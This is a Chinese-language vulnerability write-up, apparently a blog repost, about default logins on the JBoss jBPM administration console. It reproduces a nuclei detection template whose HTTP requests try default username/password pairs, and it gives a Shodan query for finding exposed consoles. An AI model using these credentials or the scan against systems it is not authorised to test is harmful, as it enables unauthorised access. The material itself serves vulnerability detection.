JBoss jBPM Administration Console Default Login Vulnerability

漏洞信息

漏洞名称: JBoss jBPM Administration Console Default Login Vulnerability

漏洞类型: 弱口令

漏洞等级: 高危

漏洞描述: JBoss jBPM 是一个由 Red Hat 提供的业务流程管理套件,广泛用于企业级应用中,以实现业务流程的自动化和管理。其管理控制台提供了一个Web界面,用于监控和管理业务流程。该控制台存在默认登录凭证的问题,攻击者可以利用这些默认凭证未经授权访问系统。

漏洞解释:此漏洞属于弱口令问题,由于JBoss jBPM管理控制台使用了默认的用户名和密码(如manager/manager, user/user, shipper/shipper, admin/admin),攻击者可以轻易猜测或使用这些凭证登录系统。这反映了系统在部署时未能强制修改默认凭证,导致安全风险。

影响分析:利用此漏洞,攻击者可以完全控制JBoss jBPM管理控制台,执行恶意操作,如部署恶意流程、窃取敏感信息或破坏业务流程。由于这是一个Web界面,攻击可以远程进行,且不需要任何前置条件或认证信息,极大地增加了被利用的风险。此外,这种漏洞的利用可以自动化进行,使得大规模的攻击成为可能。

产品厂商: redhat

产品名称: jbpm

搜索语法: html:”JBossWS”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/b7c60754265d41e02af8d5ea7c8a40acba9a6233/http%2Fdefault-logins%2Fjboss%2Fjboss-jbpm-default-login.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69

id: jboss-jbpm-default-login

info:
name: JBoss jBPM Administration Console Default Login - Detect
author: DhiyaneshDk
severity: high
description: JBoss jBPM Administration Console default login information was detected.
reference:
- https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/JBossjBPMAdminConsole.java
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:redhat:jbpm:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 12
shodan-query: html:"JBossWS"
product: jbpm
vendor: redhat
tags: jboss,jbpm,default-login

http:
- raw:
- |
GET /jbpm-console/app/tasks.jsf HTTP/1.1
Host: {{Hostname}}
- |
POST /jbpm-console/app/j_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

j_username={{user}}&j_password={{pass}}
- |
GET /jbpm-console/app/tasks.jsf HTTP/1.1
Host: {{Hostname}}

attack: pitchfork
payloads:
user:
- manager
- user
- shipper
- admin
pass:
- manager
- user
- shipper
- admin
stop-at-first-match: true

matchers-condition: and
matchers:
- type: word
part: body_1
words:
- "JBoss jBPM Administration Console"

- type: word
part: body_3
words:
- "</span>Tasks"

- type: status
status:
- 200
# digest: 4b0a00483046022100e63415d826455103202795b50a05da6af73dd81b774baebf354760424a561520022100bdbbb9739cf9e1ef03dfe81736056ee29444d3c45d4032a5bc6708fde156fbba:922c64590222798bb761d5b6d8e72950


JBoss jBPM Administration Console Default Login Vulnerability
http://example.com/2025/07/21/github_587635152/
作者
lianccc
发布于
2025年7月21日
许可协议